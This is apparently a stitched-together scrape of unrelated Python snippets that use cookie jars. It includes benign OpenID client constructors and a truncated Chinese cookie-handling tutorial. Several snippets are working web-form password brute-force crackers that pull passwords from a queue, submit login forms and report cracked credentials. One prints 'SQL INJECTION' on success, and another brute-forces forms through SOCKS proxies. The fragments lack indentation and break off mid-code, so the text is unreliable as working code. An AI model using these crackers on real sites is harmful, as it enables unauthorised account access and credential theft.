def webAuthCracker(q, username):
global isBingo
while not q.empty() and not isBingo:
password = q.get().rstrip()
cookies = cookielib.FileCookieJar('cookies')
opener = build_opener(HTTPCookieProcessor(cookies))
res = opener.open(targeturl)
htmlpage = res.read().decode()
print('+++TRYING %s: %s' % (username, password))
parseR = myHTMLParser()
parseR.feed(htmlpage)
inputtags = parseR.tagResult
inputtags[username_field] = username
inputtags[pass_field] = password
loginData = urlencode(inputtags).encode('utf-8')
loginRes = opener.open(targetpost, data=loginData)
loginResult = loginRes.read().decode()
if check in loginResult:
isBingo = True
print('---CRACKING SUCCESS!')
print('---Username[%s] Password[%s]' % (username, password))
print('---Waiting Other Threads Terminated..')
def web_bruter(self):
while not self.password_q.empty() and not self.found:
brute = self.password_q.get().rstrip()
jar = cookielib.FileCookieJar("cookies")
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
response = opener.open(target_url)
page = response.read()
print("Trying: %s : %s (%d left)" %
(self.username, brute, self.password_q.qsize()))
# parse out the hidden fields
parser = BruteParser()
parser.feed(page)
post_tags = parser.tag_results
# add our username and password fields
post_tags[username_field] = self.username
post_tags[password_field] = brute
login_data = urllib.urlencode(post_tags)
login_response = opener.open(target_post, login_data)
login_result = login_response.read()
if success_check in login_result:
self.found = True
print("[*] Bruteforce successful.")
print("[*] Username: %s" % username)
print("[*] Password: %s" % brute)
print("[*] Waiting for other threads to exit...")
def web_bruter(self):
while not self.password_q.empty() and not self.find:
brute = self.password_q.get().decode().rstrip('\n') #去除字符串末尾的空格
jar = cookiejar.FileCookieJar("cookies")
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
response = opener.open(self.target_url)
page = response.read()
print("爆破用户:%s ------> 尝试密码:%s -------> 剩余密码数:%s" %(self.username,brute,self.password_q.qsize()))
parser = BruteParser()
parser.feed(page.decode()) #返回标签的集合
post_tags = parser.tag_results
post_tags[username_tag] = self.username
post_tags[password_tag] = brute
# print post_tags
login_data = urlencode(post_tags)
login_response = opener.open(self.target_post,login_data.encode())
#print login_response.read()
login_result = login_response.headers # 这个一部因目标而异
s_login_result = int(login_result["Content-Length"])
# print s_login_result
# print login_result["Content-Length"]
if s_login_result != 34:
self.find = True
# print login_result["Content-Length"]
print("恭喜爆破成功!!!")
print("用户名%s它的密码为:%s" %(self.username,brute))
print("等待爆破线程退出........")
db = DB(self.target_url,self.username,brute)
db.burstdb()
def __init__(self, options, submitted):
self.options = options
self.submitted = submitted
self._maybe_down_message = 'Perhaps the connection was interupted or %s is down.' % self.options.site
cookie_jar = cookiejar.FileCookieJar()
urlrequest.install_opener(
urlrequest.build_opener(
urlrequest.HTTPCookieProcessor(cookie_jar)))
def __init__(self,
verify_ssl=True,
keyjar=None,
client_cert=None,
timeout=5):
"""
Initialize the instance.
:param verify_ssl: Control TLS server certificate validation. If set to
True the certificate is validated against the global settings,
if set to False, no validation is performed. If set to a filename
this is used as a certificate bundle in openssl format. If set
to a directory name this is used as a CA directory in
the openssl format.
:param keyjar: A place to keep keys for signing/encrypting messages
Creates a default keyjar if not set.
:param client_cert: local cert to use as client side certificate, as a
single file (containing the private key and the certificate) or as
a tuple of both file's path
:param timeout: Timeout for requests library. Can be specified either as
a single integer or as a tuple of integers. For more details, refer to
``requests`` documentation.
"""
self.keyjar = keyjar or KeyJar(verify_ssl=verify_ssl)
self.cookiejar = cookielib.FileCookieJar()
# Additional args for the requests library calls
self.request_args = {
"allow_redirects": False,
"cert": client_cert,
"verify": verify_ssl,
"timeout": timeout,
}
# Event collector, for tracing
self.events = None
self.req_callback = None
def webAuthCracker(username):
password = ''
cookies = cookielib.FileCookieJar('cookies')
opener = build_opener(HTTPCookieProcessor(cookies))
res = opener.open(targeturl)
htmlpage = res.read().decode()
print('+++TRYING %s: %s' %(username, password))
parseR = myHTMLParser()
parseR.feed(htmlpage)
inputtags = parseR.tagResult
inputtags[username_field] = username
inputtags[pass_field] = password
loginData = urlencode(inputtags).encode('utf-8')
loginRes = opener.open(targetpost, data=loginData)
loginResult = loginRes.read().decode()
if check in loginResult:
print('---CRACKING SUCCESS!')
print('---SQL INJECTION [%s]' %username)
def login(user, passwd, target, port, timeout_sec, log_in_file, language, retries, time_sleep, thread_tmp_filename,
socks_proxy, scan_id, scan_cmd):
username_field = "username"
password_field = "password"
exit = 0
class BruteParser(HTMLParser):
def __init__(self):
HTMLParser.__init__(self)
self.parsed_results = {}
def handle_starttag(self, tag, attrs):
if tag == "input":
for name, value in attrs:
if name == "name" and value == username_field:
self.parsed_results[username_field] = username_field
if name == "name" and value == password_field:
self.parsed_results[password_field] = password_field
if socks_proxy is not None:
socks_version = socks.SOCKS5 if socks_proxy.startswith(
'socks5://') else socks.SOCKS4
socks_proxy = socks_proxy.rsplit('://')[1]
if '@' in socks_proxy:
socks_username = socks_proxy.rsplit(':')[0]
socks_password = socks_proxy.rsplit(':')[1].rsplit('@')[0]
socks.set_default_proxy(socks_version, str(socks_proxy.rsplit('@')[1].rsplit(':')[0]),
int(socks_proxy.rsplit(':')[-1]), username=socks_username,
password=socks_password)
socket.socket = socks.socksocket
socket.getaddrinfo = getaddrinfo
else:
socks.set_default_proxy(socks_version, str(
socks_proxy.rsplit(':')[0]), int(socks_proxy.rsplit(':')[1]))
socket.socket = socks.socksocket
socket.getaddrinfo = getaddrinfo
while 1:
target_host = str(target) + ":" + str(port)
flag = 1
try:
cookiejar = cookiejar.FileCookieJar("cookies")
opener = urllib2.build_opener(
urllib2.HTTPCookieProcessor(cookiejar))
response = opener.open(target)
page = response.read()
parsed_html = BruteParser()
parsed_html.feed(page)
parsed_html.parsed_results[username_field] = user
parsed_html.parsed_results[password_field] = passwd
post_data = urllib.urlencode(parsed_html.parsed_results).encode()
except:
exit += 1
if exit is retries:
warn(messages(language, "http_form_auth_failed").format(
target, user, passwd, port))
return 1
else:
time.sleep(time_sleep)
continue
try:
if timeout_sec is not None:
brute_force_response = opener.open(
target_host, data=post_data, timeout=timeout_sec)
else:
brute_force_response = opener.open(target_host, data=post_data)
if brute_force_response.code == 200:
flag = 0
if flag is 0:
info(messages(language, "http_form_auth_success").format(
user, passwd, target, port))
data = json.dumps(
{'HOST': target, 'USERNAME': user, 'PASSWORD': passwd, 'PORT': port, 'TYPE': 'http_form_brute',
'DESCRIPTION': messages(language, "login_successful"), 'TIME': now(), 'CATEGORY': "brute",
'SCAN_ID': scan_id, 'SCAN_CMD': scan_cmd}) + "\n"
__log_into_file(log_in_file, 'a', data, language)
__log_into_file(thread_tmp_filename, 'w', '0', language)
return flag
except:
exit += 1
if exit is retries:
warn(messages(language, "http_form_auth_failed").format(
target, user, passwd, port))
return 1
else:
time.sleep(time_sleep)
continue
def __init__(
self,
verify_ssl=None,
keyjar=None,
client_cert=None,
timeout=None,
settings: PyoidcSettings = None,
):
"""
Initialize the instance.
Keyword Args:
settings
Instance of :class:`PyoidcSettings` with configuration options.
Note that the following params are deprecated in favor of settings.
:param verify_ssl: Control TLS server certificate validation. If set to
True the certificate is validated against the global settings,
if set to False, no validation is performed. If set to a filename
this is used as a certificate bundle in openssl format. If set
to a directory name this is used as a CA directory in
the openssl format.
:param keyjar: A place to keep keys for signing/encrypting messages
Creates a default keyjar if not set.
:param client_cert: local cert to use as client side certificate, as a
single file (containing the private key and the certificate) or as
a tuple of both file's path
:param timeout: Timeout for requests library. Can be specified either as
a single integer or as a tuple of integers. For more details, refer to
``requests`` documentation.
"""
self.settings = settings or PyoidcSettings()
if verify_ssl is not None:
warnings.warn(
"`verify_ssl` is deprecated, please use `settings` instead if you need to set a non-default value.",
DeprecationWarning,
stacklevel=2,
)
self.settings.verify_ssl = verify_ssl
if client_cert is not None:
warnings.warn(
"`client_cert` is deprecated, please use `settings` instead if you need to set a non-default value.",
DeprecationWarning,
stacklevel=2,
)
self.settings.client_cert = client_cert
if timeout is not None:
warnings.warn(
"`timeout` is deprecated, please use `settings` instead if you need to set a non-default value.",
DeprecationWarning,
stacklevel=2,
)
self.settings.timeout = timeout
self.keyjar = keyjar or KeyJar(verify_ssl=self.settings.verify_ssl)
self.cookiejar = cookielib.FileCookieJar()
# Additional args for the requests library calls
self.request_args = {
"allow_redirects": False,
"cert": self.settings.client_cert,
"verify": self.settings.verify_ssl,
"timeout": self.settings.timeout,
}
# Event collector, for tracing
self.events = None
self.req_callback = None
from urllib import request,parse
from http import cookiejar
# 创建cookie实例
cookie = cookiejar.CookieJar()
file = cookiejar.FileCookieJar()
mozilla = cookiejar.MozillaCookieJar()
lwp = cookiejar.LWPCookieJar()
# 创建cookie管理器
cookie_Headle = request.HTTPCookieProcessor(cookie)
# 创建http请求管理器
http_Headle = request.HTTPHandler()
# 生成https管理器
https_Headle = request.HTTPSHandler()
# 创建请求管理器
oper = request.build_opener(http_Headle,https_Headle,cookie_Headle)
'''
进行登录操作
登录完成后,将请求返回的handle信息将由请求管理器保存,可以重复使用
在请求管理器生命周期结束后,所有的hanlder信息自动销毁
'''
def test01(url):
data = {
# 用户名,密码,验证码
"email":"*****@*****.**",
"password":"******"
# "icode":""
}
try:
